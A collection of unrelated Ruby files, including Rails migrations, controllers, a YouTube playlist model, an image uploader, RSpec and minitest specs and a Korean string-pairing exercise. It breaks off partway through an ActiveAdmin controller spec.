it "returns the student's information" do
information = {
"currentGPA"=>"4.0",
"currentMealBalance"=>0,
"currentTerm"=>"S1",
"dcid"=>1,
"dob"=>"1970-01-01T00:00:00.000Z",
"ethnicity"=>"US",
"firstName"=>"John",
"gender"=>"M",
"gradeLevel"=>12,
"id"=>1,
"lastName"=>"Doe",
"middleName"=>{"@nil"=>"true"},
"photoDate"=>{"@nil"=>"true"},
"startingMealBalance"=>0
}
expect(
@student.information
).to eq(information)
end
end
end
|
# frozen_string_literal: true
class CreateCinemas < ActiveRecord::Migration[6.1]
def change
create_table :cinemas do |t|
t.integer :cinema_number
t.integer :total_seats
t.integer :columns
t.integer :rows
t.timestamps
end
add_index :cinemas, :cinema_number, unique: true
end
end
|
require 'yt/models/resource'
module Yt
module Models
# Provides methods to interact with YouTube playlists.
# @see https://developers.google.com/youtube/v3/docs/playlists
class Playlist < Resource
### SNIPPET ###
# @!attribute [r] title
# @return [String] the playlist’s title.
delegate :title, to: :snippet
# @!attribute [r] description
# @return [String] the playlist’s description.
delegate :description, to: :snippet
# @!method thumbnail_url(size = :default)
# Returns the URL of the playlist’s thumbnail.
# @param [Symbol, String] size The size of the playlist’s thumbnail.
# @return [String] if +size+ is +default+, the URL of a 120x90px image.
# @return [String] if +size+ is +medium+, the URL of a 320x180px image.
# @return [String] if +size+ is +high+, the URL of a 480x360px image.
# @return [nil] if the +size+ is not +default+, +medium+ or +high+.
delegate :thumbnail_url, to: :snippet
# @!attribute [r] published_at
# @return [Time] the date and time that the playlist was created.
delegate :published_at, to: :snippet
# @!attribute [r] channel_id
# @return [String] the ID of the channel that the playlist belongs to.
delegate :channel_id, to: :snippet
# @!attribute [r] channel_title
# @return [String] the title of the channel that the playlist belongs to.
delegate :channel_title, to: :snippet
# @!attribute [r] tags
# @return [Array<String>] the list of tags attached to the playlist.
delegate :tags, to: :snippet
### STATISTICS ###
has_one :content_detail
# @!attribute [r] item_count
# @return [Integer] the number of items in the playlist.
delegate :item_count, to: :content_detail
### ACTIONS (UPLOAD, UPDATE, DELETE) ###
# Deletes the playlist.
# @return [Boolean] whether the playlist does not exist anymore.
# @raise [Yt::Errors::Unauthorized] if {Resource#auth auth} is not an
# authenticated Yt::Account with permissions to delete the playlist.
def delete(options = {})
do_delete {@id = nil}
!exists?
end
# Updates the attributes of a playlist.
# @return [Boolean] whether the playlist was successfully updated.
# @raise [Yt::Errors::Unauthorized] if {Resource#auth auth} is not an
# authenticated Yt::Account with permissions to update the playlist.
# @param [Hash] attributes the attributes to update.
# @option attributes [String] :title The new playlist’s title.
# Cannot have more than 100 characters. Can include the characters
# < and >, which are replaced to ‹ › in order to be accepted by YouTube.
# @option attributes [String] :description The new playlist’s description.
# Cannot have more than 5000 bytes. Can include the characters
# < and >, which are replaced to ‹ › in order to be accepted by YouTube.
# @option attributes [Array<String>] :tags The new playlist’s tags.
# Cannot have more than 500 characters. Can include the characters
# < and >, which are replaced to ‹ › in order to be accepted by YouTube.
# @option attributes [String] :privacy_status The new playlist’s privacy
# status. Must be one of: private, unscheduled, public.
# @example Update title and description of a playlist.
# playlist.update title: 'New title', description: 'New description'
# @example Update tags and status of a playlist.
# playlist.update tags: ['new', 'tags'], privacy_status: 'public'
def update(attributes = {})
super
end
# Adds a video to the playlist.
# Unlike {#add_video!}, does not raise an error if video can’t be added.
# @param [String] video_id the video to add to the playlist.
# @param [Hash] options the options on how to add the video.
# @option options [Integer] :position where to add video in the playlist.
# @raise [Yt::Errors::Unauthorized] if {Resource#auth auth} is not an
# authenticated Yt::Account with permissions to update the playlist.
# @return [Yt::PlaylistItem] the item added to the playlist.
def add_video(video_id, options = {})
playlist_item_params = playlist_item_params(video_id, options)
playlist_items.insert playlist_item_params, ignore_errors: true
end
# Adds a video to the playlist.
# Unlike {#add_video}, raises an error if video can’t be added.
# @param [String] video_id the video ID to add to the playlist.
# @param [Hash] options the options on how to add the video.
# @option options [Integer] :position where to add video in the playlist.
# @raise [Yt::Errors::RequestError] if video can’t be added.
# @raise [Yt::Errors::Unauthorized] if {Resource#auth auth} is not an
# authenticated Yt::Account with permissions to update the playlist.
# @return [Yt::PlaylistItem] the item added to the playlist.
def add_video!(video_id, options = {})
playlist_item_params = playlist_item_params(video_id, options)
playlist_items.insert playlist_item_params
end
# Adds multiple videos to the playlist.
# Unlike {#add_videos!}, does not raise an error if videos can’t be added.
# @param [Array<String>] video_ids the video IDs to add to the playlist.
# @param [Hash] options the options on how to add the videos.
# @option options [Integer] :position where to add videos in the playlist.
# @raise [Yt::Errors::Unauthorized] if {Resource#auth auth} is not an
# authenticated Yt::Account with permissions to update the playlist.
# @return [Array<Yt::PlaylistItem>] the items added to the playlist.
def add_videos(video_ids = [], options = {})
video_ids.map{|video_id| add_video video_id, options}
end
# Adds multiple videos to the playlist.
# Unlike {#add_videos}, raises an error if videos can’t be added.
# @param [Array<String>] video_ids the video IDs to add to the playlist.
# @param [Hash] options the options on how to add the videos.
# @option options [Integer] :position where to add videos in the playlist.
# @raise [Yt::Errors::Unauthorized] if {Resource#auth auth} is not an
# authenticated Yt::Account with permissions to update the playlist.
# @return [Array<Yt::PlaylistItem>] the items added to the playlist.
def add_videos!(video_ids = [], options = {})
video_ids.map{|video_id| add_video! video_id, options}
end
# Deletes the playlist’s items matching all the given attributes.
# @return [Array<Boolean>] whether each playlist item matching the given
# attributes was deleted.
# @raise [Yt::Errors::RequestError] if {Resource#auth auth} is not an
# authenticated Yt::Account with permissions to update the playlist.
# @param [Hash] attributes the attributes to match the items by.
# @option attributes [<String, Regexp>] :title The item’s title.
# Pass a String for perfect match or a Regexp for advanced match.
# @option attributes [<String, Regexp>] :description The item’s
# description. Pass a String (perfect match) or a Regexp (advanced).
# @option attributes [String] :privacy_status The item’s privacy status.
# @option attributes [String] :video_id The item’s video ID.
def delete_playlist_items(attributes = {})
playlist_items.delete_all attributes
end
### ASSOCIATIONS ###
# @!attribute [r] playlist_items
# @return [Yt::Collections::PlaylistItems] the playlist’s items.
has_many :playlist_items
### ANALYTICS ###
# @macro reports
# @macro report_by_playlist_dimensions
has_report :views, Integer
# @macro report_by_playlist_dimensions
has_report :estimated_minutes_watched, Integer
# @macro report_by_gender_and_age_group
has_report :viewer_percentage, Float
# @macro report_by_day_and_state
has_report :average_view_duration, Integer
# @macro report_by_day_and_state
has_report :playlist_starts, Integer
# @macro report_by_day_and_state
has_report :average_time_in_playlist, Float
# @macro report_by_day_and_state
has_report :views_per_playlist_start, Float
### PRIVATE API ###
# @private
# Override Resource's new to set content details as well
# if the response includes them
def initialize(options = {})
super options
if options[:content_details]
@content_detail = ContentDetail.new data: options[:content_details]
end
end
# @private
# Tells `has_reports` to retrieve the reports from YouTube Analytics API
# either as a Channel or as a Content Owner.
# @see https://developers.google.com/youtube/analytics/v1/reports
def reports_params
{}.tap do |params|
if auth.owner_name
params[:ids] = "contentOwner==#{auth.owner_name}"
else
params[:ids] = "channel==#{channel_id}"
end
params[:filters] = "playlist==#{id};isCurated==1"
end
end
# @private
def exists?
!@id.nil?
end
private
# @see https://developers.google.com/youtube/v3/docs/playlists/update
def update_parts
keys = [:title, :description, :tags]
snippet = {keys: keys, required: true, sanitize_brackets: true}
status = {keys: [:privacy_status]}
{snippet: snippet, status: status}
end
# @todo: extend camelize to also camelize the nested hashes, so we
# don’t have to write videoId
def playlist_item_params(video_id, params = {})
params.dup.tap do |params|
params[:resource_id] ||= {kind: 'youtube#video', videoId: video_id}
end
end
end
end
end |
# encoding: utf-8
class ImageUploader < CarrierWave::Uploader::Base
# リサイズしたり画像形式を変更するのに必要
include CarrierWave::RMagick
# 画像の上限を700pxにする
process :resize_to_limit => [700, 700]
# 保存形式をJPGにする
process :convert => 'jpg'
# サムネイルを生成する設定
version :thumb do
process :resize_to_limit => [73, 73]
end
# jpg,jpeg,gif,pngしか受け付けない
def extension_white_list
%w(jpg jpeg gif png)
end
def store_dir
"uploads/#{model.id}"
end
def cache_dir
"tmp/uploads/cache/#{model.id}"
end
end |
require 'minitest/spec'
require 'minitest/autorun'
require File.expand_path(File.join('..', 'lib/parser.rb'), File.dirname(__FILE__))
require File.expand_path(File.join('..', 'lib/pbxproj_nodes.rb'), File.dirname(__FILE__))
class PbxMerge
attr_accessor :merged, :conflicts
def initialize(lists)
@merged = []
@conflicts = []
local_matches = branch_matches lists[:local], lists[:base]
remote_matches = branch_matches lists[:remote], lists[:base]
partners = []
end
private
def branch_matches(branch, base)
matches = []
branch.each do |node|
base_index = base.index {|base_node| base_node.content_match? node}
if base_index
base_node = base[base_index]
match_type = :updated
match_type = :unchanged if node == base_node
matches << {:branch_node => node, :base_node => base_node, :type => match_type}
else
matches << {:branch_node => node, :base_node => nil, :type => :inserted}
end
end
base.each do |base_node|
match_index = local_matches.index {|node| node.content_match? base_node}
unless match_index
matches << {:branch_node => nil, :base_node => base_node, :type => :deleted}
end
end
matches
end
end
describe PbxMerge do
before do
@header = <<'END_PBXPROJ_CONTENT'
{
objects = {
END_PBXPROJ_CONTENT
@content = <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
@footer = <<'END_PBXPROJ_CONTENT'
};
}
END_PBXPROJ_CONTENT
@base_content = '' + @header + @content + @footer
@base = Parser.parse(@base_content).build_files
end
describe "objects unchanged in local and unchanged in remote" do
before do
@local = Parser.parse(@base_content).build_files
@remote = Parser.parse(@base_content).build_files
end
it "takes the local version" do
skip "merge behavior pending"
merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
merge.merged.must_equal @local
merge.conflicts.wont_equal nil
end
end
describe "objects unchanged in local and deleted in remote" do
before do
@local = Parser.parse(@base_content).build_files
@remote_content = '' + @header
@remote_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
END_PBXPROJ_CONTENT
@remote_content << @footer
@remote = Parser.parse(@remote_content).build_files
end
it "deletes the object" do
skip "merge behavior pending"
merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
merge.merged.must_equal @remote
merge.conflicts.wont_equal nil
end
end
describe "objects unchanged in local and changed in remote" do
before do
@local = Parser.parse(@base_content).build_files
@remote_content = '' + @header
@remote_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = F33DF00DF33DF00DF33DF00D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
@remote_content << @footer
@remote = Parser.parse(@remote_content).build_files
end
it "takes the remote version" do
skip "merge behavior pending"
merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
merge.merged.must_equal @remote
merge.conflicts.wont_equal nil
end
end
describe "objects deleted in local and unchanged in remote" do
before do
@local_content = '' + @header
@local_content << <<'END_PBXPROJ_CONTENT'
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
@local_content << @footer
@local = Parser.parse(@local_content).build_files
@remote = Parser.parse(@base_content).build_files
end
it "deletes the object" do
skip "merge behavior pending"
merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
merge.merged.must_equal @local
merge.conflicts.wont_equal nil
end
end
describe "objects deleted in local and deleted in remote" do
before do
@content = '' + @header + @footer
@local = Parser.parse(@content).build_files
@remote = Parser.parse(@content).build_files
end
it "deletes the object" do
skip "merge behavior pending"
merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
merge.merged.must_equal @local
merge.conflicts.wont_equal nil
end
end
describe "objects deleted in local and changed in remote" do
before do
@local_content = '' + @header
@local_content << <<'END_PBXPROJ_CONTENT'
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
@local_content << @footer
@local = Parser.parse(@local_content).build_files
@remote_content = '' + @header
@remote_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = F33DF00DF33DF00DF33DF00D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
@remote_content << @footer
@remote = Parser.parse(@remote_content).build_files
end
it "reports a conflict" do
skip "merge behavior pending"
merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
merge.conflicts.wont_equal(nil) && merge.conflicts.length.wont_equal(0)
end
end
describe "objects changed in local and unchanged in remote" do
before do
@local_content = '' + @header
@local_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = F33DF00DF33DF00DF33DF00D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
@local_content << @footer
@local = Parser.parse(@local_content).build_files
@remote = Parser.parse(@base_content).build_files
end
it "takes the local version" do
skip "merge behavior pending"
merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
merge.merged.must_equal @local
merge.conflicts.wont_equal nil
end
end
describe "objects changed in local and deleted in remote" do
before do
@local_content = '' + @header
@local_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = F33DF00DF33DF00DF33DF00D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
@local_content << @footer
@local = Parser.parse(@local_content).build_files
@remote_content = '' + @header
@remote_content << <<'END_PBXPROJ_CONTENT'
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
@remote_content << @footer
@remote = Parser.parse(@remote_content).build_files
end
it "reports a conflict" do
skip "merge behavior pending"
merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
merge.conflicts.wont_equal(nil) && merge.conflicts.length.wont_equal(0)
end
end
describe "objects changed in local and changed in remote" do
before do
@local_content = '' + @header
@local_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = F33DF00DF33DF00DF33DF00D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
@local_content << @footer
@local = Parser.parse(@local_content).build_files
@remote_content = '' + @header
@remote_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = D34DB33FD34DB33FD34DB33F /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
@remote_content << @footer
@remote = Parser.parse(@remote_content).build_files
end
it "reports a conflict" do
skip "merge behavior pending"
merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
merge.conflicts.wont_equal(nil) && merge.conflicts.length.wont_equal(0)
end
end
describe "objects added in local and objects added in remote" do
before do
@local_content = '' + @header
@local_content << <<'END_PBXPROJ_CONTENT'
8C992EE8137B6E7B00DD2CA7 /* ProjectCrayonsAppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ProjectCrayonsAppDelegate.h; sourceTree = "<group>"; };
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
@local_content << @footer
@local = Parser.parse(@local_content).build_files
@remote_content = '' + @header
@remote_content << <<'END_PBXPROJ_CONTENT'
8C992EE9137B6E7B00DD2CA7 /* ProjectCrayonsAppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ProjectCrayonsAppDelegate.m; sourceTree = "<group>"; };
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
@remote_content << @footer
@remote = Parser.parse(@remote_content).build_files
end
it "takes all new objects" do
skip "merge behavior pending"
merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
merge.merged.length.must_equal 4
merge.conflicts.wont_equal nil
end
end
describe "multiple changes" do
it "merges the changes" do
skip "merge behavior pending"
end
end
end
|
# -*- coding : utf-8 -*-
require 'spec_helper'
describe Mushikago::Hanamgri::GetAnalysisRequest do
context '.new("domain_name", "request_id")' do
subject{ Mushikago::Hanamgri::GetAnalysisRequest.new('domain_name', 'request_id')}
it{ should be_kind_of(Mushikago::Http::GetRequest)}
its(:domain_name){ should == 'domain_name'}
its(:request_id){ should == 'request_id'}
its(:path){ should == '/1/hanamgri/domains/domain_name/analyses/request_id'}
end
end
|
class Changetodefault < ActiveRecord::Migration
def change
change_column :students, :name, :string, :default => "hello"
end
end
|
class Api::V1::AssessmentsController < ApplicationController
def index
@assessments = Assessment.all
render json: @assessments
end
# POST /assessments
def create
@assessment = Assessment.new(assessment_params)
if @assessment.save
render json: @assessment, status: :created
else
render json: @assessment.errors, status: :unprocessable_entity
end
end
def player_assessments
@player = Player.all.find(params[:player_id])
render json: @player.assessments.all
end
def assessment_params
params.require(:assessment).permit(:rating, :user_id, :tournament_id, :player_id, :assessment_type)
end
end
|
# frozen_string_literal: true
require 'dry/validation'
module Contract
# Create Foo Contract
class CreateFoo < Dry::Validation::Contract
params do
required(:name).filled(:string)
end
end
end
|
##
# 짝지어 제거하기
# 문제 설명
# 짝지어 제거하기는, 알파벳 소문자로 이루어진 문자열을 가지고 시작합니다. 먼저 문자열에서 같은 알파벳이 2개 붙어 있는 짝을 찾습니다. 그다음, 그 둘을 제거한 뒤, 앞뒤로 문자열을 이어 붙입니다. 이 과정을 반복해서 문자열을 모두 제거한다면 짝지어 제거하기가 종료됩니다. 문자열 S가 주어졌을 때, 짝지어 제거하기를 성공적으로 수행할 수 있는지 반환하는 함수를 완성해 주세요. 성공적으로 수행할 수 있으면 1을, 아닐 경우 0을 리턴해주면 됩니다.
#
# 예를 들어, 문자열 S = baabaa 라면
#
# b aa baa → bb aa → aa →
#
# 의 순서로 문자열을 모두 제거할 수 있으므로 1을 반환합니다.
#
# 제한사항
# 문자열의 길이 : 1,000,000이하의 자연수
# 문자열은 모두 소문자로 이루어져 있습니다.
# 입출력 예
# s result
# baabaa 1
# cdcd 0
# 입출력 예 설명
# 입출력 예 #1
# 위의 예시와 같습니다.
# 입출력 예 #2
# 문자열이 남아있지만 짝지어 제거할 수 있는 문자열이 더 이상 존재하지 않기 때문에 0을 반환합니다.
#
def solution(s='')
stack = []
ary = s.split('')
ary.each do |c|
if stack.last == c
stack.pop
else
stack.push(c)
end
end
return stack.length > 0 ? 0 : 1
end
puts solution "cdcd"
|
class BuildingController < ApplicationController
get '/new' do
signed_in_user
@title = t('create_record')
@post = Building.new
slim :'buildings/new'
end
get '' do
@title = t('building')
@buildings = Building.all.paginate(per_page: 10, page: params[:page])
slim :'buildings/index'
end
post '' do
@building = current_user.buildings.build(title: params[:building][:title],
body: params[:building][:body])
save_photo if params[:building][:photo]
if @building.save
flash.now[:success] = t('post_is_created')
redirect "/buildings/#{@building.id}"
else
slim :'buildings/new'
end
end
# Get the individual page of the post with this ID.
get '/:id' do
find_building(params[:id])
@title = @building.title
slim :'buildings/show'
end
get '/:id/edit' do
find_building(params[:id])
user_is_owner?(@building.id, 'Building')
@title = t('edit_record')
slim :'buildings/edit'
end
put '/:id' do
find_building(params[:id])
if params[:building][:delphoto]
ids = params[:building][:delphoto].map(&:to_i)
Building.delete(ids)
end
save_photo if params[:building][:photo]
if @building.update_attributes(title: params[:building][:title],
body: params[:building][:body])
redirect "/buildings/#{@building.id}"
else
slim :'buildings/edit'
end
end
delete '/:id' do
@building = Building.find(params[:id]);
@building.destroy
end
private
def find_building(id)
begin
@building = Building.find(id)
rescue ActiveRecord::RecordNotFound
flash[:danger] = t('record_is_not_found')
redirect '/'
end
end
def save_photo
params[:building][:photo].each do |photo|
@photo = @building.photos.build(:photo => photo)
slim :'buildings/new' unless @photo.save
end
end
end |
# TODO
# more specs for fragment caching:
# cache_get, cache_set, cached?, cache, expire
describe "merb-cache-fragment" do
it "should render index" do
c = dispatch_to(CacheController, :index)
c.body.should == "test index"
end
it "should cache the fragment (erb capture/concat)" do
c = dispatch_to(CacheController, :action1)
NOW = c.body.strip
c.cache_get("key1").strip.should == NOW
end
it "should cache the fragment (haml capture/concat)" do
c = dispatch_to(CacheController, :action2)
now = c.body.strip
c.cache_get("key11").strip.should == now
sleep 1
c = dispatch_to(CacheController, :action2)
c.cache_get("key11").strip.should == now
c.expire("key11")
c.cache_get("key11").should be_nil
end
it "should use the fragment" do
sleep 1
c = dispatch_to(CacheController, :action1)
c.body.strip.should == NOW
end
it "should expire the fragment" do
CACHE.expire("key1")
CACHE.cache_get("key1").should be_nil
end
it "should refresh the template" do
c = dispatch_to(CacheController, :action1)
c.body.strip.should_not == NOW
end
it "should return nil for unknown keys" do
CACHE.cache_get("unknown_key").should be_nil
end
it "should expire matching keys" do
CACHE.cache_set("test1", "test1")
CACHE.cache_get("test1").should == "test1"
CACHE.cache_set("test2", "test2")
CACHE.cache_get("test2").should == "test2"
CACHE.cache_set("test3", "test3")
CACHE.cache_get("test3").should == "test3"
CACHE.expire(:match => "test")
CACHE.cache_get("test1").should be_nil
CACHE.cache_get("test2").should be_nil
CACHE.cache_get("test3").should be_nil
end
it "should expire entry after 3 seconds" do
CACHE.cache_set("timed_key", "vanish in 3 seconds", 0.05)
CACHE.cache_get("timed_key").should == "vanish in 3 seconds"
sleep 3.5
CACHE.cache_get("timed_key").should be_nil
end
it "should expire in many ways" do
CACHE.cache_set("test1", "test1")
CACHE.expire("test1")
CACHE.cache_get("test1").should be_nil
CACHE.cache_set("test2/id1", "test2")
CACHE.expire(:key => "test2", :params => %w(id1))
CACHE.cache_get("test2/id1").should be_nil
CACHE.cache_set("test3", "test3")
CACHE.expire(:key => "test3")
CACHE.cache_get("test3").should be_nil
CACHE.cache_set("test4/id1", "test4")
CACHE.expire(:key => "test4", :params => %w(id1), :match => true)
CACHE.cache_get("test4/id1/id2").should be_nil
end
it "should expire all keys" do
CACHE.expire_all
CACHE.cache_get("key1").should be_nil
end
it "should cache/restore ruby objects" do
now = Time.now
data = {:key1 => "key1", :key2 => "key2", :now => Time.now }
CACHE.cache_set("key1", data)
_data = CACHE.cache_get("key1")
data.should == _data
end
end
|
class CreateCandidatures < ActiveRecord::Migration[5.0]
def change
create_table :candidatures do |t|
t.references :gig, foreign_key: true
t.references :volunteer, foreign_key: true
t.boolean :accepted
t.text :introduction_letter
t.timestamps
end
end
end
|
# frozen_string_literal: true
# Handles application request
class ApplicationController < ActionController::API
def authorize_entity
if decoded_auth_token
@entity = if decoded_auth_token[:entity] == 'User'
User.find(decoded_auth_token[:auth_entity_id])
else
Guest.find(decoded_auth_token[:auth_entity_id])
end
return {
response: true,
entity: @entity
} if @entity
raise ActionController::RoutingError.new('Not Found')
else
# BadRequest, InvalidAuthenticityToken, InvalidCrossOriginRequest, MethodNotAllowed, MissingFile, RenderError, RoutingError, SessionOverflowError, UnknownController, UnknownFormat, UnknownHttpMethod
# 656444
raise ActionController::InvalidAuthenticityToken.new("Invalid Token")
end
end
def decoded_auth_token
JsonWebToken.decode(http_auth_header)
end
def http_auth_header
if request.headers['Authorization'].present?
request.headers['Authorization'].split(' ').last
else
raise ActionController::InvalidAuthenticityToken.new("Missing Token")
end
end
def encode_message(payload)
payload["token"] = Rails.application.credentials.secret_key_base
crypt = ActiveSupport::MessageEncryptor.new generate_key
crypt.encrypt_and_sign(ActiveSupport::JSON.encode(payload))
end
def decrypte_message(token)
crypt = ActiveSupport::MessageEncryptor.new generate_key
ActiveSupport::JSON.decode(crypt.decrypt_and_verify(token))
end
def checkout_params
params.require(:checkout).permit(:email, :name)
end
def redirectUrl_params
params.require(:redirectUrl).permit(:path)
end
private
def generate_key
key = ActiveSupport::KeyGenerator.new(
Rails.application.credentials.token[:password]
).generate_key(
Rails.application.credentials.token[:salt], 32
)
key
end
end
|
class AddSearchIdToLists < ActiveRecord::Migration[5.2]
def change
add_column :lists, :search_id, :string
end
end
|
require 'rails_helper'
RSpec.describe Admin::LetterConversationsController, type: :controller do
render_views
let(:resource_class) { LetterConversation }
let(:all_resources) { ActiveAdmin.application.namespaces[:admin].resources }
let(:resource) { all_resources[resource_class] }
let(:page) { Capybara::Node::Simple.new(response.body) }
let!(:sender_user) { create(:user) }
let!(:recipient_user) { create(:user) }
let!(:letter_conversation) { create(:letter_conversation, sender_id: sender_user.id, recipient_id: recipient_user.id) }
let!(:message) { create(:message, letter_conversation_id: letter_conversation.id, user_id: recipient_user.id) }
let(:valid_attributes) do
FactoryGirl.attributes_for :conversation
end
let(:invalid_attributes) do
{ sender_id: '' }
end
login_admin
describe "GET index" do
it 'returns http success' do
get :index
expect(response).to have_http_status(:success)
end
it 'assigns the letter_conversation' do
get :index
expect(assigns(:letter_conversations)).to include(letter_conversation)
end
it "should render the expected columns" do
get :index
expect(page).to have_content(letter_conversation.id)
end
let(:filters_sidebar) { page.find('#filters_sidebar_section') }
it "filter Recipient Name exists" do
get :index
expect(filters_sidebar).to have_css('label[for="q_recipient_name"]', text: 'Получатель')
expect(filters_sidebar).to have_css('select[name="q[recipient_name_eq]"]')
end
it "filter Sender Name exists" do
get :index
expect(filters_sidebar).to have_css('label[for="q_sender_name"]', text: 'Отправитель')
expect(filters_sidebar).to have_css('select[name="q[sender_name_eq]"]')
end
it "filter Recipient Name works" do
matching_recipient_user = create(:user, name: 'test')
non_matching_recipient_user = create(:user, name: 'non')
matching_letter_conversation = create(:letter_conversation, sender_id: sender_user.id, recipient_id: matching_recipient_user.id)
non_matching_letter_conversation = create(:letter_conversation, sender_id: sender_user.id, recipient_id: non_matching_recipient_user.id)
matching_message = create(:message, letter_conversation_id: matching_letter_conversation.id, user_id: sender_user.id)
non_matching_message = create(:message, letter_conversation_id: non_matching_letter_conversation.id, user_id: sender_user.id)
get :index, q: { recipient_name_eq: 'test' }
expect(assigns(:letter_conversations)).to include(matching_letter_conversation)
expect(assigns(:letter_conversations)).not_to include(non_matching_letter_conversation)
end
it "filter Sender Name works" do
matching_sender_user = create(:user, name: 'test')
non_matching_sender_user = create(:user, name: 'non')
matching_letter_conversation = create(:letter_conversation, sender_id: matching_sender_user.id, recipient_id: recipient_user.id)
non_matching_letter_conversation = create(:letter_conversation, sender_id: non_matching_sender_user.id, recipient_id: recipient_user.id)
matching_message = create(:message, letter_conversation_id: matching_letter_conversation.id, user_id: sender_user.id)
non_matching_message = create(:message, letter_conversation_id: non_matching_letter_conversation.id, user_id: sender_user.id)
get :index, q: { sender_name_eq: 'test' }
expect(assigns(:letter_conversations)).to include(matching_letter_conversation)
expect(assigns(:letter_conversations)).not_to include(non_matching_letter_conversation)
end
end
describe "GET new" do
it 'returns http success' do
get :new
expect(response).to have_http_status(:success)
end
it 'assigns the letter_conversation' do
get :new
expect(assigns(:letter_conversation)).to be_a_new(LetterConversation)
end
it "should render the form elements" do
get :new
expect(page).to have_field('Sender')
expect(page).to have_field('Recipient')
end
end
describe "POST create" do
context "with valid params" do
it "creates a new LetterConversation" do
expect {
post :create, :letter_conversation => valid_attributes
}.to change(LetterConversation, :count).by(1)
end
it "assigns a newly created letter_conversation as @letter_conversation" do
post :create, :letter_conversation => valid_attributes
expect(assigns(:letter_conversation)).to be_a(LetterConversation)
expect(assigns(:letter_conversation)).to be_persisted
end
it "redirects to the created letter_conversation" do
post :create, :letter_conversation => valid_attributes
expect(response).to have_http_status(:redirect)
expect(response).to redirect_to(admin_letter_conversation_path(LetterConversation.last))
end
it 'should create the letter_conversation' do
post :create, :letter_conversation => valid_attributes
